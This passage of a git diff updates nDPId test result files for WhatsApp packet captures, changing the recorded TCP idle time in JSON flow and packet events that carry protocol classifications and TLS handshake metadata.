{"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1432820693796,"flow_last_seen":1432820695137,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":742,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1432820624900,"flow_last_seen":1432820633508,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":968,"flow_tot_l4_payload_len":3069,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00838{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1432820558921,"flow_last_seen":1432820572412,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":2486,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00701{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1432820633802,"flow_last_seen":1432820681629,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":505,"flow_tot_l4_payload_len":2241,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820568947,"flow_last_seen":1432820628171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.252.121.1","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820569427,"flow_last_seen":1432820629171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"179.60.192.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820570876,"flow_last_seen":1432820631171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.93.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} @@ -77,7 +77,7 @@ 00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820568346,"flow_last_seen":1432820627171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.64.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820567917,"flow_last_seen":1432820626171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.74.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820567259,"flow_last_seen":1432820625171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1432820681899,"flow_last_seen":1432820691973,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":254,"flow_tot_l4_payload_len":1783,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1432820681899,"flow_last_seen":1432820691973,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":254,"flow_tot_l4_payload_len":1783,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00579{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","packets-captured":261,"packets-processed":261,"total-skipped-flows":0,"total-l4-data-len":14389,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":13,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":13,"total-idle-flows":13,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":81,"global_ts_msec":1432820695137} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 261/261 diff --git a/test/results/whatsappfiles.pcap.out b/test/results/whatsappfiles.pcap.out index 0675ae4fb..98a891214 100644 --- a/test/results/whatsappfiles.pcap.out +++ b/test/results/whatsappfiles.pcap.out @@ -1,20 +1,20 @@ 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"whatsappfiles.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"whatsappfiles.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1519924083411} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1519924083411,"flow_last_seen":1519924083411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1519924083411,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1519924083411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1519924083411,"pkt":"XEl5dU5qkLkxKPrKCABFAABAAABAAEAG5oDAqAIduTzYNcIKAbs8JoRvAAAAALDC\/\/8eywAAAgQFtAEDAwYBAQgKKOUV+QAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1519924083501,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1519924083501,"pkt":"kLkxKPrKXEl5dU5qCABFAAA8AABAAFUG0YS5PNg1wKgCHQG7wgonNGFZPCaEcKASbTj4zgAAAgQFggQCCAoJITj5KOUV+QEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1519924083503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1519924083503,"pkt":"XEl5dU5qkLkxKPrKCABFAAA0AABAAEAG5ozAqAIduTzYNcIKAbs8JoRwJzRhWoAQCAWMQgAAAQEICijlFlQJITj5"} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1519924083411,"flow_last_seen":1519924083506,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1519924083506,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1519924083411,"flow_last_seen":1519924083598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":1641,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1519924083598,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01333{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1519924083411,"flow_last_seen":1519924083599,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3451,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1519924083599,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","server_names":"*.cdn.whatsapp.net,*.snr.whatsapp.net,*.whatsapp.com,*.whatsapp.net,whatsapp.com,whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=Menlo Park, O=Facebook, Inc., CN=*.whatsapp.net","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"10:54:EB:4A:A2:2A:42:2F:A6:1C:E7:9C:F4:84:10:7E:30:2E:56:BB"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1519924240121,"flow_last_seen":1519924240121,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1519924240121,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1519924240121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1519924240121,"pkt":"XEl5dU5qkLkxKPrKCABFAABAAABAAEAG5oDAqAIduTzYNcIiAbuCj0EnAAAAALDC\/\/+6MAAAAgQFtAEDAwYBAQgKKOd3WAAAAAAEAgAA"} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1519924240177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1519924240177,"pkt":"kLkxKPrKXEl5dU5qCABFAAA8AABAAFUG0YS5PNg1wKgCHQG7wiLPr2ypgo9BKKASbTgw1AAAAgQFggQCCAq3hjooKOd3WAEDAwg="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1519924240182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1519924240182,"pkt":"XEl5dU5qkLkxKPrKCABFAAA0AABAAEAG5ozAqAIduTzYNcIiAbuCj0Eoz69sqoAQCAXEZQAAAQEICijnd5W3hjoo"} -00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1519924240121,"flow_last_seen":1519924240183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1519924240183,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"4e1a414c4f4c99097edd2a9a98e336c8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":316,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1519924240121,"flow_last_seen":1519924240244,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1519924240244,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"4e1a414c4f4c99097edd2a9a98e336c8","ja3s":"96681175a9547081bf3d417f1a572091","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1519924083411,"flow_last_seen":1519924193429,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":183524,"flow_avg_l4_payload_len":592,"midstream":0,"thread_ts_msec":1519924247388,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"}} -00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":310,"flow_first_seen":1519924240121,"flow_last_seen":1519924247388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":226819,"flow_avg_l4_payload_len":731,"midstream":0,"thread_ts_msec":1519924247388,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1519924083411,"flow_last_seen":1519924083411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1519924083411,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1519924083411,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1519924083411,"pkt":"XEl5dU5qkLkxKPrKCABFAABAAABAAEAG5oDAqAIduTzYNcIKAbs8JoRvAAAAALDC\/\/8eywAAAgQFtAEDAwYBAQgKKOUV+QAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1519924083501,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1519924083501,"pkt":"kLkxKPrKXEl5dU5qCABFAAA8AABAAFUG0YS5PNg1wKgCHQG7wgonNGFZPCaEcKASbTj4zgAAAgQFggQCCAoJITj5KOUV+QEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1519924083503,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1519924083503,"pkt":"XEl5dU5qkLkxKPrKCABFAAA0AABAAEAG5ozAqAIduTzYNcIKAbs8JoRwJzRhWoAQCAWMQgAAAQEICijlFlQJITj5"} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1519924083411,"flow_last_seen":1519924083506,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1519924083506,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1519924083411,"flow_last_seen":1519924083598,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":1641,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1519924083598,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01333{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1519924083411,"flow_last_seen":1519924083599,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3451,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1519924083599,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","server_names":"*.cdn.whatsapp.net,*.snr.whatsapp.net,*.whatsapp.com,*.whatsapp.net,whatsapp.com,whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=Menlo Park, O=Facebook, Inc., CN=*.whatsapp.net","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"10:54:EB:4A:A2:2A:42:2F:A6:1C:E7:9C:F4:84:10:7E:30:2E:56:BB"}} 